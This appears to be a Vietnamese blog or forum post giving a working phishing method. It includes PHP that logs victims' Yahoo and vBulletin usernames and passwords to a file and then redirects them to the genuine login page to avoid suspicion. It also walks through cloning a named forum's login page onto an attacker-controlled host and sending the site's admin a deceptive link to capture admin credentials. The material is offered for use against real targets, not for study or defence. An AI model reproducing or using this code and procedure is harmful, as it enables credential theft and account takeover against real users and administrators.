Tìm hiểu theo bài viết "Video hacking yahoo"
Trong bài viết video hacking yahoo,có bạn đã rất tài tình (Mà cũng không biết của thằng nèo nữa ) để lấy được username và password của victim thông qua đoạn code sau :
Trích:
$f=fopen("xxxx.html","a");
fwrite($f,"$login@yahoo.com : $passwd\n=====================\n");
fclose($f);
header("location: http://login.yahoo.com/config/login?...o=& .intltype =us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMs gr=0&.chkP=Y&.done=&login= $login&passwd=$passwd&.persistent=");
?>
Trong đó chú ý đến :
login :lưu tên đăng nhập
passwd:mật khẩu.
sau khi đăng nhập victim sẽ được chuyển tới site security login của yahoo để không nghi ngờ về việc đăng nhập của mình đã được lưu lại
Trích:
location: http://login.yahoo.com/config/login?...o=& .intltype =us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMs gr=0&.chkP=Y&.done=&login= $login&passwd=$passwd&.persistent=
Từ đó sao chúng ta không xài đến cách lấy pass của admin bằng cách này .
Cũng tương tự chúng ta đến trang login của victim để save lại nó:
Chẳng hạn thế này:
http://tuoitreonline.info/forum/newt...=newthread&f=2
(chưa đăng nhập)
Nhớ thêm các file trong background cho chuẩn vởi site đó.Up toàn bộ lên hostban và thay cai .html của nó thành dạng như .newthread.php2.htm cho giồng 2 bài viết.
Trong file .html của cái này nhở thay :
http://www.tuoitreonline.info/forum/login.php
bằng http://hostban.com/forum/login.php
file login.php của bạn sẽ là`:
Trích:
$f=fopen("xxxx.html","a");
fwrite($f,"$vb_login_username : $vb_login_password\n===========\n");
fclose($f);
header("location: http://www.tuoitreonline.info/forum/showthread.php?p=152554#post152554");
?>
Bạn thấy đó chính "vb_login_username" và "vb_login_password" là code lưu lại pass dùng cho login Vbb(mọi phiên bản ).
và "xxxx.html" là file trống dùng để lưu lại username và pass.
Chu ý rằng :
Trích:
http://www.tuoitreonline.info/forum/...554#post152554
Đó chính là cái site ma` mình đánh lừa cái thằng admin của trang này .
Sau khi reg nick gủi cho admin (dạng tin nhắn ) đoạn sau:
Trích:
http://www.tuoitreonline.info/forum/showthread.php?p=152554#post152554Admin cho hỏi.....
Chẳng hiểu thể nào mà cai Quote này nó đọc cả code. chep cái này tại đây nhé http://ttvnn.info/forum/lua.html
Với "http://www.tuoitreonline.info/forum/showthread.php?p=152554#post152554" la` cái đã lưu ý ở trên còn "http://hostban.com/forum/newthread.php2.htm" là trang mà bạn lưu site login của nó.
Cách dùng [URL= này khả thi hơn cái code "Thế nhé
Vn_inter(vniss)
Không có nhận xét nào:
Đăng nhận xét